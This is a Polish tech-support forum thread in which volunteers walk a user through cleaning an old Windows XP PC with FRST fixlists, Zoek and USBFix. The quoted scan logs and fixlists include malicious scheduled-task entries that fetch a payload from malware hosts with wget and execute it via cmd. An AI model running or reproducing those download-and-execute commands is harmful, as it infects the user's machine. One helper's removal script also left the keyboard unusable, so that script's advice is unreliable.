Zero Access? Komp + pendrive, wirusy w rejestrze

[Palovnik]

Witam. Tak jak w temacie. Windows praktycznie czysty. Wirusy w rejestrze, w Windows, stare pliki w rejestrze z programów dawno usuniętych, w tym ze starego antywirusa usuniętego dawno przez deinstalatora, pulpit ucieka od active desktop, zainfekowany pendrive, niemożność usunięcia programów apple, niemożność użycia panda vaccine, mbam i krsv nic nie wykrywają, było tak jakby kilku użytkowników na tym komputerze, gmer debuguje w trakcie, gdzieś w dokumentach wszystkich użytkowników w folderze microsoft było coś podpisane jako crypto..

 

FRST.txt Addition.txt Shortcut.txt

[Palovnik]

Przepraszam, nie wiem jak zedytować żeby dodać wcześniejsze pliki .txt.

 

AdwCleanerS0.txt Addition stare.txt legal_notices.txt

[jessica]

Nic tu nie wskazuje na istnienie ZeroAcces, ani żadnej innej infekcji.

 

Tylko kosmetyka:

twórz Notatnik i wklej w nim:

 

CustomCLSID: HKU\S-1-5-21-839522115-1303643608-1417001333-1003_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\DOCUME~1\Dawid\Pulpit\BESTPL~1.EXE => Brak pliku
Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA
Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp
Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\58053762.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\58053762.sys => ""="Driver"
HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k
HKLM\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe,C:\Program Files\G DATA\TotalProtection\AVKTray\AVKTray.exe,C:\Program Files\G DATA\TotalProtection\AVKKid\AVKCKS.exe,
ProxyServer: [S-1-5-21-839522115-1303643608-1417001333-1003] => http=222.66.115.233:80
AutoConfigURL: [S-1-5-21-839522115-1303643608-1417001333-1003] => http=222.66.115.233:80
BHO: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~1\ALLPLA~1\Iplex\IPLEXT~1.DLL => Brak pliku
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab
S3 MozillaMaintenance; "C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe" [X]
S3 WMPNetworkSvc; "C:\Program Files\Windows Media Player\wmpnetwk.exe" [X]
R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG)
C:\WINDOWS\system32\drivers\GDKBFlt32.sys
S3 CrystalSysInfo; \??\C:\Program Files\MediaCoder\SysInfo.sys [X]
S4 hpt3xx; Brak ImagePath
S4 IntelIde; Brak ImagePath
S3 LgBttPort; system32\DRIVERS\lgbtport.sys [X]
S3 lgbusenum; system32\DRIVERS\lgbtbus.sys [X]
S3 LGVMODEM; system32\DRIVERS\lgvmodem.sys [X]
S3 Passthru; system32\DRIVERS\PPFlt.sys [X]
S3 usbbus; system32\DRIVERS\lgusbbus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgusbdiag.sys [X]
S3 USBModem; system32\DRIVERS\lgusbmodem.sys [X]
C:\WINDOWS\Minidump\Mini*.dmp
HOSTS:
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

 

jessi

[Palovnik]

Po:PusTy:Wpis:klaWiaTuRy

[jessica]

W dniu 4.09.2016 o 17:42, Palovnik napisał:

Po:PusTy:Wpis:klaWiaTuRy

 

co to jest?

[Palovnik]

witam ponownie, mam w koncu dostep. otoz chodzilo mi o to ze po wykonaniu tego skryptu nie dziala mi klawiatura, tj. tak jakby sie spalila, swiecila sie lampka caps locka i zero reakcji. to byla stara klawiatura na ps2. pozyczylem od kolegi klawiature z wejsciem usb, w ogole jej nie wykrywalo ze jest podlaczona (pendrive dziala). nowa klawiatura na ps2 ma to samo, swieci sie lampka kontrolna caps locka i tyle. sprawdzalem i pisze ze nie ma sterownika, a system nie potrafi go automatycznie wykryc.

[picasso]

Skoryguję co zostało tu powiedziane. Infekcja tu była, załączono ją w skrypcie "kosmetycznym":

 

Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA
Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp
Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp

 

Ale to nie ZeroAccess, który jest martwy od lat.

 

 

Cytat

Wirusy w rejestrze, w Windows, stare pliki w rejestrze z programów dawno usuniętych, w tym ze starego antywirusa usuniętego dawno przez deinstalatora, pulpit ucieka od active desktop, zainfekowany pendrive, niemożność usunięcia programów apple, niemożność użycia panda vaccine, mbam i krsv nic nie wykrywają, było tak jakby kilku użytkowników na tym komputerze, gmer debuguje w trakcie, gdzieś w dokumentach wszystkich użytkowników w folderze microsoft było coś podpisane jako crypto..

 

- Jakie "wirusy" w rejestrze? I po czym poznajesz, że pendrive jest "zainfekowany"?

- Na czym polega niemożność deinstalacji programu "Apple Software Update"?

- Tak, w komputerze jest kilku użytkowników i jest to normalny układ. Wszystkie konta z wyjątkiem osobiście przez Ciebie założonego (Dawid) oraz wprowadzonego przez instalację .NET Framework 1.1 (ASPNET) są wbudowane w każdy system XP. To od .NET można usunąć, jest zbędne.

 

==================== Konta użytkowników: =============================

Administrator (S-1-5-21-839522115-1303643608-1417001333-500 - Administrator - Enabled)
ASPNET (S-1-5-21-839522115-1303643608-1417001333-1004 - Limited - Enabled)
Dawid (S-1-5-21-839522115-1303643608-1417001333-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Dawid
Gość (S-1-5-21-839522115-1303643608-1417001333-501 - Limited - Disabled)
Pomocnik (S-1-5-21-839522115-1303643608-1417001333-1000 - Limited - Enabled)
SUPPORT_388945a0 (S-1-5-21-839522115-1303643608-1417001333-1002 - Limited - Disabled)

 

- A foldery "crypto" są poprawne i nie próbuj ich usuwać, bo uszkodzisz system certyfikatów systemu:

 

C:\Documents and Settings\[Folder konta]\Dane aplikacji\Microsoft\Crypto

 

 

Cytat

otoz chodzilo mi o to ze po wykonaniu tego skryptu nie dziala mi klawiatura

 

Tak, bo jessika przetworzyła w skrypcie sterownik G Data filtrujący klawiaturę, ale nie zdejmując filtra z klawiatury (to należało zrobić przed próbą usuwania sterownika). KBFlt = Keyboard Filter:

 

R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG)

 

 

 

Otwórz Notatnik i wklej w nim:

 

Reg: reg add HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318} /v UpperFilters /t REG_MULTI_SZ /d kbdclass /f
CMD: net user ASPNET /delete
S3 IDriverT; "C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe" [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope - brak wartości
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2011-06-28] [Brak podpisu cyfrowego]
Reboot:

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw plik. A klawiatura powinna zacząć działać.

 

[Palovnik]

1. Rejestr -widziałem wpisy dawno usuniętych programów i aplikacji. Jakoś drażni to moje oczy  jest jakieś narzędzie które potrafi sobie z tym poradzić?

2. Apple Software Update - przy próbie usunięcia przez panel sterowania pojawia się komunikat: wystąpił problem z tym pakietem Instalatora Windows. Nie można uruchomić programu wymaganego do dokończenia tej instalacji. Skontaktuj się z personelem pomocy technicznej lub dostawcą pakietu. (--> klikam w ok) i następnie: błąd krytyczny podczas instalacji.

3. Skrypt wykonany, log w załączniku. Ale nasuwa mi się pytanie: G Data zainstalowałem baaardzo dawno temu, nie spełniało norm dla tego mojego komputerowego dziadka, więc chciałem usunąć. Zwyczajnie przez panel sterowania i menu start się nie dało, usunąłem więc przez program do usuwania G Data. A jak się później okazało wciąż miałem G Data w systemie, aktywne ikony, program jakby działał w tle, choć nie działał już jako antywirus. Teraz się okazuje że wciąż "chronił?" klawiaturę. Czy to normalne?

 

Fixlog.txt

[picasso]

Nie odpowiedziałweś mi na pytanie:

 

picasso napisał:

Jakie "wirusy" w rejestrze? I po czym poznajesz, że pendrive jest "zainfekowany"?

 

Cytat

Rejestr -widziałem wpisy dawno usuniętych programów i aplikacji. Jakoś drażni to moje oczy  jest jakieś narzędzie które potrafi sobie z tym poradzić?

 

Pokaż o które wpisy chodzi. Jeśli rzecz o automatach czyszczących rejestr, nieszczególnie polecam. Można sobie nagrabić.

 

 

Cytat

G Data zainstalowałem baaardzo dawno temu, nie spełniało norm dla tego mojego komputerowego dziadka, więc chciałem usunąć. Zwyczajnie przez panel sterowania i menu start się nie dało, usunąłem więc przez program do usuwania G Data. A jak się później okazało wciąż miałem G Data w systemie, aktywne ikony, program jakby działał w tle, choć nie działał już jako antywirus. Teraz się okazuje że wciąż "chronił?" klawiaturę. Czy to normalne?

 

Zdarza się, że są problemy z deinstalacją tego typu programów. A sterowniki filtrujące urządzenia mogą pozostać nawet po deinstalacji. Od czasu do czasu to widzę np. przy Avast czy Kasperskym.

 

 

Cytat

Apple Software Update - przy próbie usunięcia przez panel sterowania pojawia się komunikat: wystąpił problem z tym pakietem Instalatora Windows. Nie można uruchomić programu wymaganego do dokończenia tej instalacji. Skontaktuj się z personelem pomocy technicznej lub dostawcą pakietu. (--> klikam w ok) i następnie: błąd krytyczny podczas instalacji.

 

Uruchom Zoek. W oknie wklej:

 

Apple Software Update;u

 

Klik w Run Script. Przedstaw wynikowy log zoek-results.txt (po zmianie nazwy z *.log).

 

[Palovnik]

1. Jeśli chodzi o wirusy w rejestrze.. hmm. jeszcze zanim założyłem tutaj temat skanowałem system kilkoma programami antywirusowymi, kilkukrotnie, jeden z nich (nie pamiętam który) wykrył 2 zagrożenia, które usunąłem (razem niestety z raportem). Przeglądając rejestr znalazłem jeden wpis zaczynający się od Micorsoft, uznałem to za wpis wirusa, nie jestem teraz w stanie go odnaleźć.

 

2. Jeśli chodzi o pendrive.. Byłem w szpitalu 10 dni i po powrocie miałem wrażenie że komputer strasznie wolno chodzi, a zwłaszcza przeglądając zawartość pendrive - komputer dostawał strasznej zwiechy. Uznałem wtedy pendrive w przypływie złości i z braku wiedzy jako współwinnego, nie skanowałem jego zawartości, ale też nie jestem w stanie empirycznie potwierdzić że "coś" w sobie ma. 

 

3. Jak już wspomniałem, moja wiedza jest podstawowa, ale z tego co rzuca mi się w oczy..

 

H_Key_Classes_Root: w.sz-->wtwExtension, AllPlayerFile, masa folderów z Best Player, gg, java plugin i javascript, wtw;

 

 

H_Key_Local_Machine -- > Software: Adobe, Adw Cleaner, Apple Inc. (w tym oprócz tegoż software update również Quick Time), Brother, Eset, Javasoft, Kaspersky Lab, LG Electronics, Malwarebytes, OldTimer Tools, Panda Software...

 

To tak z moją wiedzą i na szybko..

 

Czyli programy takie jak kiedyś używałem czyli CC Cleaner i Ntreg (coś takiego) Optimizer są niewskazane?

 

4. Dołączam skrypt.

 

zoek-results.txt

[picasso]

Zoek wykonał zadanie i nie powinieneś już widzieć "Apple Software Update" na liście zainstalowanych.

 

 

Cytat

2. Jeśli chodzi o pendrive.. Byłem w szpitalu 10 dni i po powrocie miałem wrażenie że komputer strasznie wolno chodzi, a zwłaszcza przeglądając zawartość pendrive - komputer dostawał strasznej zwiechy. Uznałem wtedy pendrive w przypływie złości i z braku wiedzy jako współwinnego, nie skanowałem jego zawartości, ale też nie jestem w stanie empirycznie potwierdzić że "coś" w sobie ma.

 

Na wszelki wypadek możesz zrobić log USBFix z opcji Listing przy podpiętym pendrive.

 

 

Cytat

3. Jak już wspomniałem, moja wiedza jest podstawowa, ale z tego co rzuca mi się w oczy..

 

Te które znalazłeś i jesteś pewien, że to szczątki możesz oczywiście usunąć. Mógłbyś też uruchomić wersję CCleaner Portable, zrobić skan na wyszukiwanie śmieci w rejestrze i dostarczyć log do oceny.

 

 

Cytat

Czyli programy takie jak kiedyś używałem czyli CC Cleaner i Ntreg (coś takiego) Optimizer są niewskazane?

 

Czyszczenie rejestru w rozumieniu automatycznego wyszukiwania wpisów odpadkowych jest ryzykowne. Automat nigdy nie uzyska percepcji żywego człowieka i mogą zostać usunięte wpisy które nie powinny być. Tu na forum były rozmaite przeboje, użytkownicy wyczyścili rejestr "za bardzo" i pojawiły się liczne problemy w systemie, które trzeba było odkręcać np. Przywracaniem systemu. Natomiast kompaktowanie rejestru za pomocą NTREGOPT, czy usuwanie plików tymczasowych w CCleaner pożądane.

 

[Palovnik]

1. Nie ma tego wpisu w panelu sterowania.

 

2. USBFix wydaje się ok. Tylko nie wiem czemu pokazuje włączone Windows Update skoro jest wyłączone.

 

3. Skan zrobiony zwykłym CCCleaner, przekierowuje mnie z wersji portable do zwykłej, dołączam log.

 

UsbFix_Report.txt cccleaner rejestr.txt

[picasso]

Cytat

2. USBFix wydaje się ok. Tylko nie wiem czemu pokazuje włączone Windows Update skoro jest wyłączone.

 

Raport USBFix nie wykazuje, by w root pendrive była jakaś infekcja.

 

 

Cytat

3. Skan zrobiony zwykłym CCCleaner, przekierowuje mnie z wersji portable do zwykłej, dołączam log.

 

Czy masz na myśli, że pobiera się plik ccsetup522.zip? To jest wersja portable. Wyniki z CCleaner przejrzałam na szybko. Na pierwszy rzut oka większość zdaje się być do wyrzucenia. Zastanowiły mnie jednak pewne wpisy relatywne do instalacji Microsoftu, powiązane z figurującymi na liście zainstalowanych łatami IE8, IE8 jako takim, MSXML, .NET Framework. Czy Ty aby nie usuwałeś z dysku wcześniej na siłę jakiś elementów Microsoftu?

 

[Palovnik]

Hm, no usuwałem. Chciałem na siłę pousuwać co się da bo praktycznie używam 3-4 aplikacje a w ciągu kilku miesięcy planuję wymianę sprzętu, no i tak wyszło.

[picasso]

No cóż, w tej sytuacji założę, że wyniki CCleaner odpowiadają stanowi faktycznemu i to są po prostu skutki zbyt intensywnego "czyszczenia dysku". Przed usuwaniem w CCleaner rzecz jasna zrób kopię zapasową usuwanych wpisów, usuń wszystkie wyniki, zesetuj system i poprzyglądaj się czy są jakieś jawne skutki uboczne.

[Palovnik]

No więc trochę minęło, już z tydzień po czyszczeniu rejestru, wszystko działa jak należy. Myślę że to wszystko, tylko jeszcze posłużę się tematem z ostatnimi krokami po dezynfekcji, dziękuję serdecznie za pomoc.

[picasso]

Tak, tu tylko zostało zastosowanie DelFix i czyszczenie folderów Przywracania systemu, które są opisane w przyklejonym.

 

Temat rozwiązany. Zamykam.